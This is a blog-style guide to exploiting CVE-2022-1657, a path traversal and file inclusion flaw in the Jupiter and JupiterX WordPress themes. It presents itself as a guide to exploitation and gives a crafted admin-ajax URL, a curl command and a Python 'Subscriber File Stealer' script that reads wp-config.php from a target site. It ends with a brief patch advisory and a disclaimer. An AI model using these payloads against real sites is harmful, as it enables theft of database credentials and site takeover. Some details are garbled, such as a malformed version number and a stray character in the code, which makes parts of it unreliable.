CVE-2022-1657 - Critical Path Traversal and Local File Inclusion in Jupiter and JupiterX WordPress Themes

The CVE-2022-1657 vulnerability exposes millions of WordPress sites running vulnerable versions of the popular Jupiter (<= 6.10.1) and JupiterX (<= 2..6) themes. This critical security flaw allows even the lowest-privileged users—subscribers—to read arbitrary files from the server using simple AJAX requests. In the worst case, attackers can leak sensitive configuration, escalate their privileges, or possibly achieve remote code execution.

This post will show you how the vulnerability works, who is at risk, give you code examples, and point to official references. This is the most detailed, exclusive guide for understanding and exploiting CVE-2022-1657—using plain, simple language.

Who Can Exploit: Any logged-in user—even regular subscribers

- Impact: Reading arbitrary files (wp-config.php, /etc/passwd, etc.); potential RCE in certain situations

Official References

- Wordfence Advisory on CVE-2022-1657

Jupiter: mka_cp_load_pane_action

When these actions are called, they include a PHP file based on a user-supplied slug parameter. There's ZERO input sanitization—the input can contain things like ../../../wp-config.php.

Where are the vulnerable files?

- JupiterX: lib/admin/control-panel/control-panel.php
- Jupiter: framework/admin/control-panel/logic/functions.php

In lib/admin/control-panel/control-panel.php

function load_control_panel_pane() {
    $slug = $_REQUEST['slug'];
    include JUPITERX_CONTROL_PANEL_PANES . $slug . '.php';
}
add_action('wp_ajax_jupiterx_cp_load_pane_action', 'load_control_panel_pane');

$slug comes directly from user input (from the AJAX request)

- You can use ../ to do path traversal

How Would You Exploit It?

Goal: Read sensitive files, e.g. wp-config.php

Precondition: You need a subscriber-level account or higher.

2. Find out your AJAX endpoint. Usually

https://targetsite.com/wp-admin/admin-ajax.php

3. Craft your malicious URL. For JupiterX

https://targetsite.com/wp-admin/admin-ajax.php?action=jupiterx_cp_load_pane_action&slug=../../../../../../wp-config

- The number of ../ depends on the directory structure.

4. Send the request. You can use curl, Postman, or just paste in the browser if logged in

curl -b 'wordpress_logged_in_cookie=...' \
"https://targetsite.com/wp-admin/admin-ajax.php?action=jupiterx_cp_load_pane_action&slug=../../../../../../wp-config"

Exploit Demo: Subscriber File Stealer

Below is a quick-and-dirty Python proof-of-concept exploit. You just need subscriber credentials and the website URL.

import requests

url = 'https://targetsite.com/wp-admin/admin-ajax.php'
username = 'subscriber'
password = 'password123'

session = requests.Session()
session.post('https://targetsite.com/wp-login.php';, data={
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In'
})

payload = {
    'action': 'jupiterx_cp_load_pane_action',  # or 'mka_cp_load_pane_action' for Jupiter
    'slug': '../../../../../../wp-config'
}
r = session.get(url, params=payload)
print(r.text)

What Can Attackers Do?

- Read sensitive files: wp-config.php, .env, /etc/passwd

Escalate privileges: Steal database credentials, maybe inject admin users

- Possible remote code execution: If attackers can write files that are later included (like uploading a custom plugin or avatar)

Final Words

CVE-2022-1657 is a *classic* example of why validating and sanitizing user input is absolutely critical—especially when including files. If your site runs Jupiter or JupiterX, update right away!

More Reading

- Wordfence: Critical Vulnerabilities in Jupiter and JupiterX
- CVE Details for CVE-2022-1657


Never trust user input—especially when building WordPress themes!
If you found this post helpful, share and protect your WordPress sites!


*Disclaimer: This post is for educational purposes only. Do not exploit sites you do not own or have permission to test.*

Timeline

Published on: 06/13/2022 14:15:00 UTC
Last modified on: 06/21/2022 21:03:00 UTC